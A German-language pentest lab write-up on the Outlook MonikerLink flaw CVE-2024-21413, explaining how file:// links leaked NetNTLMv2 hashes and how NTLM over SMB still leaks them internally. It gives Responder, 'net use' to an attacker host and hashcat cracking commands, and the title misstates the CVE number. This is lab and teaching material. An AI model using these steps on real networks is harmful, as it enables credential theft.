
Labor erstellt für PenTest der Schwachstelle CVE 2024-214113 (MONIKER LINK).
Dieses Projekt zielte darauf ab, die Schwachstelle CVE-2024-21413 (MonikerLink) zu untersuchen, indem ausgenutzt wurde, wie das SMB/NTLM-Protokoll für die Erfassung von Anmeldeinformationen missbraucht werden kann. Selbst nach dem offiziellen Patch von Microsoft zeigt das Labor, dass das Konzept in internen Szenarien weiterhin gültig ist.
Die Schwachstelle (CVE-2024-21413), bekannt als MonikerLink, wurde als kritisch (CVSS 9.8) eingestuft. Sie tritt auf, weil Outlook 'file://'-Links unsicher verarbeitet, indem es alte COM-APIs (Moniker Objects) verwendet. Diese Objekte erlaubten Outlook, externe Ressourcen ohne den Schutz der Protected View aufzurufen, was den Client dazu veranlasste, automatisch SMB-Verbindungen zu initiieren.
Es handelt sich um eine Windows-Funktion, die es erlaubt, COM-Objekte über spezielle Links zu referenzieren.
Der ursprüngliche Exploit missbrauchte per E-Mail gesendete 'file://'-Links oder UNC-Pfade.
Durch Hinzufügen des Zeichens '!' im Link war es möglich, interne Schutzmechanismen von Outlook zu umgehen und das externe Ressource direkt zu öffnen.
Dies führte zu einer automatischen NTLM-Authentifizierung, die NetNTLMv2-Hashes ohne wesentliche Benutzerinteraktion an den Angreifer preisgab.
Der Patch KB5002519 blockiert speziell dieses Verhalten in Outlook und verhindert, dass 'file://'-Links auf diese Weise verarbeitet werden.
Allerdings funktioniert die automatische NTLM-Authentifizierung von Windows weiterhin außerhalb des Outlook-Kontexts; das bedeutet, jeder Versuch, auf SMB-Ressourcen in einer Umgebung zuzugreifen, in der NTLM aktiviert ist und keine Authentifizierungseinschränkungen bestehen, kann weiterhin automatisch Hashes senden.
📌 Beziehung zwischen Outlook, SMB/NTLM und Responder
Warum funktioniert es immer noch? Weil NTLM ein Legacy-Protokoll ist, das bei SMB-Verbindungen automatisch authentifiziert, unabhängig von Outlook. Der Patch behebt den Outlook-Client, beseitigt jedoch nicht das NTLM-Verhalten unter Windows


Während der Tests blockierte Outlook file://-Links aus E-Mails und zeigte eine Sicherheitswarnung an:

Der Patch KB5002519, veröffentlicht im Februar 2024, mildert den externen Vektor über E-Mail, indem er file://-Links blockiert.
Allerdings erlaubt das NTLM-Protokoll weiterhin die automatische Authentifizierung bei SMB-Verbindungen.
Das bedeutet, dass obwohl Outlook vor diesem spezifischen Exploit geschützt ist, die interne Angriffsfläche weiterhin gültig bleibt.
Der Kern des Problems liegt in der Abhängigkeit von NTLM als Authentifizierungsmechanismus, der weiterhin anfällig für die Erfassung von Hashes bei SMB-Verbindungen ist.
sudo responder -I eth0

\\<IP do atacante>\test.

net use \\<IP do atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

Knacken mit Hashcat Bevor wir Hashcat ausführen, kopieren wir den Hash aus der Logdatei in eine Datei in unserem Home-Verzeichnis (~/hash.txt). Dies erleichtert die Handhabung und stellt sicher, dass Hashcat direkten Zugriff auf den Inhalt hat. Anschließend führen wir Hashcat im Modus 5600 (NetNTLMv2) mit der Wordlist rockyou.txt aus. Dieser Prozess versucht, den Hash offline zu knacken und zeigt, wie schwache Passwörter schnell gefunden werden können. Das Ergebnis zeigt, ob das Passwort gefunden wurde, und verdeutlicht das tatsächliche Risiko der Schwachstelle.
hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
Anmerkung: Das eigentliche Passwort wird aus Sicherheitsgründen nicht angezeigt. Ziel ist es, den Prozess und die Schwachstelle zu demonstrieren.